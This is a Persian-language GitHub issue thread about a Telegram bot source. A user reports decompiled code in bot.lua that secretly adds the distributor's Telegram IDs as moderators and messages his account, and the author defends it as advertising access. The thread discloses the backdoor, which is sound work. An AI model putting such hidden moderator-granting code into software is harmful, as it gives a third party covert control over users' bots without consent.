### ISSUE TITLE
مشکل امنیتی

### ISSUE THREAD

**Issue by hamid07ss** [tgMember/sinchi#2]
من فایل 
bot.lua
رو دی کامپایل کردم و داخل این فایل یک سری کد پیدا کردم که به شکل زیر میباشد:

> bot.sendMessage(d.chat_id_, d.id_, 1, f, "md")
bot.sendMessage(d.chat_id_, d.id_, 1, f, "md")
bot.searchPublicChat("sajjad_021")
bot.unblockUser(158955285)
bot.importContacts(989216973112, "sinchi", "Online", 158955285)
bot.sendBotStartMessage(158955285, 158955285, "/start")
bot.sendMessage(158955285, 0, 1, "OnlineBot", 1, "md")
db:sadd("mods" .. bot_id, 158955285)
db:sadd("mods" .. bot_id, 180191663)

دوستان به نظر شما این کد چه کاری انجام میدهد؟؟؟!!!؟؟
این چت آیدی برای کیه؟ 

> **158955285
180191663**

**دوستان لطفا گول اینجور کد های آماده را نخورید**

**Comment by mohazadi** [comment]
ممنون از شما دوست عزیز...

**Comment by hamid07ss** [comment]
> function fuck(i, j, k)
                        if j.ID == "Error" then
                            bot.searchPublicChat("tgSeenBot")
                            bot.sendBotStartMessage(361357617, 361357617, "/start")
                        end
                    end
                    tdcli_function({ID = "GetChat", chat_id_ = 361357617}, fuck, nil)



واقعا که...

**Comment by sajjad-021** [comment]
کسی که به اضافه کردن مخاطب و آیدی تلگرام میگه امنیت نمیدوم چی باید بگم.
داخل 
sudo.lua
هم آیدیم هست بپا هک نشی.

**Comment by sajjad-021** [comment]
راستی سعی کنید کمتر از کدهای آماده استفاده کنید.
برای سلامتی خوب نیست.
بهتره خودتون تو خونه کد درست کنید و میل کنید.

**Comment by shakibonline** [comment]
امنیت فقط دزدیدن اطلاعات نیست، همین که کسی دسترسی غیر مجاز به چیزی پیدا کنه میشه مشکل امنیتی، همین که شفاف سازی نکنی در مورد کدت یعنی مشکل امنیت. من نمی خوام خودم رو درگیر دعواهای بچه گانه کنم، اما نمی دونم این چه مرضی هست که همه ی ما رو گرفته. کد اصلی که تمام این رباتا از تبچی تا سینچی  همه و همه باهاش نوشته شده یه جا یه سودوی غیرمجاز نداره، ولی توی تمام سورس ها فارسی یه سری سودو هست، یه سری کد هست که معلوم نیست چه کاری انجام میده ، این برای سورس هایی هست که کامپایل نشدن، با این سابقه ی خوب ما ایرانی باید از هر کدی که کامپایل شده حزر کرد! نمی خوام به شما یا کسی تهمت بزنم، ولی خوبه که دوستانی که اکثرا هم اطلاعات زیادی در مورد برنامه نویسی ندارند و صرفا از روی فیلم و آموزش این ربات ها رو لانچ می کنن، یکم بیشتر حواسشون رو جمع کنن!
مطمئنا قیمت پایین این سورس ها و آموزشش بی دلیل نیست!

**Comment by sajjad-021** [comment]
اولا دسترسی غیرمجاز یعنی ورود به حریم خصوصی و با دزدیدن اطلاعات هیچ فرقی نداره.
.من نه به حریم خصوصی کسی وارد شدم نه میتونم دسترسی داشته باشم
دوما اگه کد اصلی رو نگه کنید متوجه میشید 
sudo
با
mod
فرق داره
db:sadd("mods" .. bot_id, 158955285)
من به عنوان مدیر درجه دوم دسترسی دارم و دسترسی من فقط در حد ارسال تبلیغات هفته ای 3-4 باربیشتر نیست.
سوما کد اصلی تبچی هم تبلیغات داره اونم روزی 3-4 بار.
چهارما اگه شما به تبلیغات میگید دسترسی غیر مجاز، پس تمام برنامه ی اندروید، پی سی و... که پوش، نوت و... ارسال  میکنند دسترسی غیرمجازه.
اگه فرهنگ داشته باشید به این کار میگن تبلیغات نه دسترسی غیرمجاز.
با همه این اوصاف اگر تو کانال نگاه کنید 
https://telegram.me/tgMember/69
متوجه میشید که کسایی که از سورس من ربات ساختند و استفاده میکنند گفتم بیان که اکانت سرور یا ربات پشتیبان براشون رایگان بسازم که بازم نارضایتی وجود نداشته باشه.
در آخر هم بگم اگه مالک سورس کس دیگه است ، انتهای توضیحات نوشتم و تو سورس هیچ وقت نزدم برنامه نویس یا ساخته شده توسط من.
نوشتم ادیت و ویرایش شده.
به این میگن کپی رایت.
امیدوارم فهم و درک مردم تا حدی برسه که اول تحقیق کنن بعد تهمت بزنن.
روزوروزگار همگی نیک و بی حسرت
یاعلی.

**Comment by alireza-khan** [comment]
dawsh sajjad karet doroste.
namoosan baziya kheyli gorbeh sefat hastan.
khastam 60 toman pool bedam vali ba amoozeshet khodam sakhtam.
damet garm.
